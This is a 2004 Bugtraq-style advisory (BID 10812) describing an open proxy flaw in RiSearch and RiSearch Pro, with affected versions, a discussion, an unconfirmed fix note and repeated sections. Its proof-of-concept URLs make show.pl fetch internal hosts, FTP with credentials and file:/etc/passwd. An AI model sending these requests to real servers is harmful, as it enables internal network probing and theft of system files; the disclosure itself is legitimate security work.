RiSearch/RiSearch Pro Open Proxy Vulnerability
BID:10812
Info
RiSearch/RiSearch Pro Open Proxy Vulnerability
| Bugtraq ID: | 10812 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 27 2004 12:00AM |
| Updated: | Jul 27 2004 12:00AM |
| Credit: | Discovery of this vulnerability is credited to Phil Robinson, Gerald Gallagher, and Kendric Tang. |
| Vulnerable: |
RiSearch Software RiSearch Pro 3.2.6 RiSearch Software RiSearch 0.99.8 RiSearch Software RiSearch 0.99.7 RiSearch Software RiSearch 0.99.6 RiSearch Software RiSearch 0.99.5 RiSearch Software RiSearch 0.99.4 RiSearch Software RiSearch 0.99.3 RiSearch Software RiSearch 0.99.2 RiSearch Software RiSearch 0.99.1 |
| Not Vulnerable: | |
Discussion
RiSearch/RiSearch Pro Open Proxy Vulnerability
RiSearch and RiSearch Pro are reported prone to an open proxy vulnerability. It is reported that the issue presents itself due to a lack of sufficient sanitization performed on user supplied URI parameters.
A remote attacker may exploit this condition in order to launch attacks against local and public services in the context of the site that is hosting the vulnerable script.
RiSearch and RiSearch Pro are reported prone to an open proxy vulnerability. It is reported that the issue presents itself due to a lack of sufficient sanitization performed on user supplied URI parameters.
A remote attacker may exploit this condition in order to launch attacks against local and public services in the context of the site that is hosting the vulnerable script.
Exploit / POC
RiSearch/RiSearch Pro Open Proxy Vulnerability
The following examples are available:
http://www.example.com/cgi-bin/search/show.pl?url=http://www.google.com
http://www.example.com/cgi-bin/search/show.pl?url=http://192.168.0.1
http://www.example.com/cgi-bin/search/show.pl?url=http://localhost:8080
http://www.example.com/cgi-bin/search/show.pl?url=ftp://192.168.0.1
http://www.example.com/cgi-bin/search/show.pl?url=ftp://username:[email protected]
http://www.example.com/cgi-bin/search/show.pl?url=file:/etc/passwd
The following examples are available:
http://www.example.com/cgi-bin/search/show.pl?url=http://www.google.com
http://www.example.com/cgi-bin/search/show.pl?url=http://192.168.0.1
http://www.example.com/cgi-bin/search/show.pl?url=http://localhost:8080
http://www.example.com/cgi-bin/search/show.pl?url=ftp://192.168.0.1
http://www.example.com/cgi-bin/search/show.pl?url=ftp://username:[email protected]
http://www.example.com/cgi-bin/search/show.pl?url=file:/etc/passwd
Solution / Fix
RiSearch/RiSearch Pro Open Proxy Vulnerability
Solution:
It is reported that an update to address this issue is available. This is not confirmed. Customers are advised to contact the vendor for details regarding obtaining and applying an appropriate update.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
It is reported that an update to address this issue is available. This is not confirmed. Customers are advised to contact the vendor for details regarding obtaining and applying an appropriate update.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
RiSearch/RiSearch Pro Open Proxy Vulnerability
References:
References:
- RiSearch Homepage (RiSearch Software)
- RiSearch Software Homepage (RiSearch Software)
- IRM 009: RiSearch and RiSearch ProPro are vulnerable to open FTP/HTTP proxy, dir ("IRM Advisories"
)